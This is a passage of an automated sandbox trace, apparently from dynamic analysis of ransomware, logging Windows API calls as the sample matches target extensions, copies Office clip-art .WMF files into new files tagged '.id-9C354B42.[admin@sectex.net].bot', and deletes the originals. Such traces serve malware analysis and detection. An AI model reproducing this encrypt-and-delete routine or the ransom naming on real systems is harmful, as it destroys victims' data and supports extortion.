	[0160.085] lstrlenW (lpString=".zip") returned 4
	[0160.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.085] lstrlenW (lpString=".rar") returned 4
	[0160.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.085] lstrlenW (lpString=".bz2") returned 4
	[0160.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.085] lstrlenW (lpString=".7z") returned 3
	[0160.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.085] lstrlenW (lpString=".dbf") returned 4
	[0160.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.085] lstrlenW (lpString=".1cd") returned 4
	[0160.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107148.WMF") returned 63
	[0160.085] lstrlenW (lpString=".jpg") returned 4
	[0160.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.085] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.085] lstrlenW (lpString="J0107150.WMF") returned 12
	[0160.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.086] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=13456) returned 1
	[0160.086] CloseHandle (hObject=0x25c) returned 1
	[0160.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf")) returned 0x20
	[0160.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.086] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.086] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.087] GetLastError () returned 0x0
	[0160.087] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3490, lpOverlapped=0x0) returned 1
	[0160.089] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x34a0, lpOverlapped=0x0) returned 1
	[0160.090] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.090] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.090] SetEndOfFile (hFile=0x37c) returned 1
	[0160.090] CloseHandle (hObject=0x37c) returned 1
	[0160.090] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.090] SetEndOfFile (hFile=0x25c) returned 1
	[0160.092] CloseHandle (hObject=0x25c) returned 1
	[0160.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.330] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107150.wmf")) returned 1
	[0160.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.689] lstrlenW (lpString=".doc") returned 4
	[0160.689] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.689] lstrlenW (lpString=".docx") returned 5
	[0160.689] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0160.689] lstrlenW (lpString=".pdf") returned 4
	[0160.689] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.689] lstrlenW (lpString=".xls") returned 4
	[0160.689] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.690] lstrlenW (lpString=".xlsx") returned 5
	[0160.690] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0160.690] lstrlenW (lpString=".ppt") returned 4
	[0160.690] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.690] lstrlenW (lpString=".zip") returned 4
	[0160.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.690] lstrlenW (lpString=".rar") returned 4
	[0160.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString=".bz2") returned 4
	[0160.690] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString=".7z") returned 3
	[0160.690] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.690] lstrlenW (lpString=".dbf") returned 4
	[0160.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.690] lstrlenW (lpString=".1cd") returned 4
	[0160.690] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.690] lstrlenW (lpString=".jpg") returned 4
	[0160.690] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.690] lstrlenW (lpString=".doc") returned 4
	[0160.690] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.690] lstrlenW (lpString=".docx") returned 5
	[0160.690] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0160.690] lstrlenW (lpString=".pdf") returned 4
	[0160.690] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.691] lstrlenW (lpString=".xls") returned 4
	[0160.691] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.691] lstrlenW (lpString=".xlsx") returned 5
	[0160.691] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0160.691] lstrlenW (lpString=".ppt") returned 4
	[0160.691] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.691] lstrlenW (lpString=".zip") returned 4
	[0160.691] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.691] lstrlenW (lpString=".rar") returned 4
	[0160.691] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.691] lstrlenW (lpString=".bz2") returned 4
	[0160.691] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.691] lstrlenW (lpString=".7z") returned 3
	[0160.691] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.691] lstrlenW (lpString=".dbf") returned 4
	[0160.691] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.691] lstrlenW (lpString=".1cd") returned 4
	[0160.691] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107150.WMF") returned 63
	[0160.691] lstrlenW (lpString=".jpg") returned 4
	[0160.691] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.691] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.691] lstrlenW (lpString="J0107188.WMF") returned 12
	[0160.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.711] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4536) returned 1
	[0160.711] CloseHandle (hObject=0x388) returned 1
	[0160.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf")) returned 0x20
	[0160.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.712] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.712] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0160.713] GetLastError () returned 0x0
	[0160.713] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x11b8, lpOverlapped=0x0) returned 1
	[0160.716] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x11c0, lpOverlapped=0x0) returned 1
	[0160.717] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.717] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.718] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.718] CloseHandle (hObject=0x1b4) returned 1
	[0160.718] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.718] SetEndOfFile (hFile=0x388) returned 1
	[0160.729] CloseHandle (hObject=0x388) returned 1
	[0160.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.730] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf")) returned 1
	[0160.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.730] lstrlenW (lpString=".doc") returned 4
	[0160.730] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.730] lstrlenW (lpString=".docx") returned 5
	[0160.730] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0160.730] lstrlenW (lpString=".pdf") returned 4
	[0160.730] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.730] lstrlenW (lpString=".xls") returned 4
	[0160.731] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.731] lstrlenW (lpString=".xlsx") returned 5
	[0160.731] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0160.731] lstrlenW (lpString=".ppt") returned 4
	[0160.731] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.731] lstrlenW (lpString=".zip") returned 4
	[0160.731] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.731] lstrlenW (lpString=".rar") returned 4
	[0160.731] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString=".bz2") returned 4
	[0160.731] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString=".7z") returned 3
	[0160.731] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.731] lstrlenW (lpString=".dbf") returned 4
	[0160.731] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.731] lstrlenW (lpString=".1cd") returned 4
	[0160.731] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.731] lstrlenW (lpString=".jpg") returned 4
	[0160.731] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.731] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.731] lstrlenW (lpString=".doc") returned 4
	[0160.731] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.731] lstrlenW (lpString=".docx") returned 5
	[0160.731] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0160.731] lstrlenW (lpString=".pdf") returned 4
	[0160.731] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.732] lstrlenW (lpString=".xls") returned 4
	[0160.732] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.732] lstrlenW (lpString=".xlsx") returned 5
	[0160.732] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0160.732] lstrlenW (lpString=".ppt") returned 4
	[0160.732] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.732] lstrlenW (lpString=".zip") returned 4
	[0160.732] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.732] lstrlenW (lpString=".rar") returned 4
	[0160.732] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.732] lstrlenW (lpString=".bz2") returned 4
	[0160.732] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.732] lstrlenW (lpString=".7z") returned 3
	[0160.732] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.732] lstrlenW (lpString=".dbf") returned 4
	[0160.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.732] lstrlenW (lpString=".1cd") returned 4
	[0160.732] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF") returned 63
	[0160.732] lstrlenW (lpString=".jpg") returned 4
	[0160.732] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.732] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.732] lstrlenW (lpString="J0107192.WMF") returned 12
	[0160.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.733] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9968) returned 1
	[0160.733] CloseHandle (hObject=0x388) returned 1
	[0160.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf")) returned 0x20
	[0160.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.734] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.734] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0160.735] GetLastError () returned 0x0
	[0160.735] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x26f0, lpOverlapped=0x0) returned 1
	[0160.747] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2700, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2700, lpOverlapped=0x0) returned 1
	[0160.747] ReadFile (in: hFile=0x388, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.748] WriteFile (in: hFile=0x1b4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.748] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.748] CloseHandle (hObject=0x1b4) returned 1
	[0160.748] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.748] SetEndOfFile (hFile=0x388) returned 1
	[0160.750] CloseHandle (hObject=0x388) returned 1
	[0160.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.751] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf")) returned 1
	[0160.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.752] lstrlenW (lpString=".doc") returned 4
	[0160.752] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString=".docx") returned 5
	[0160.752] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.752] lstrlenW (lpString=".pdf") returned 4
	[0160.752] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString=".xls") returned 4
	[0160.752] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.752] lstrlenW (lpString=".xlsx") returned 5
	[0160.752] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.752] lstrlenW (lpString=".ppt") returned 4
	[0160.752] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.752] lstrlenW (lpString=".zip") returned 4
	[0160.752] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.752] lstrlenW (lpString=".rar") returned 4
	[0160.752] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString=".bz2") returned 4
	[0160.752] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString=".7z") returned 3
	[0160.752] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.752] lstrlenW (lpString=".dbf") returned 4
	[0160.752] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.752] lstrlenW (lpString=".1cd") returned 4
	[0160.752] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.752] lstrlenW (lpString=".jpg") returned 4
	[0160.752] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.753] lstrlenW (lpString=".doc") returned 4
	[0160.753] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString=".docx") returned 5
	[0160.753] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0160.753] lstrlenW (lpString=".pdf") returned 4
	[0160.753] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString=".xls") returned 4
	[0160.753] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.753] lstrlenW (lpString=".xlsx") returned 5
	[0160.753] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0160.753] lstrlenW (lpString=".ppt") returned 4
	[0160.753] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF") returned 63
	[0160.753] lstrlenW (lpString=".zip") returned 4
	[0160.753] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.753] lstrlenW (lpString=".rar") returned 4
	[0160.753] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString=".bz2") returned 4
	[0160.753] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.753] lstrlenW (lpString=".7z") returned 3
	[0160.753] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
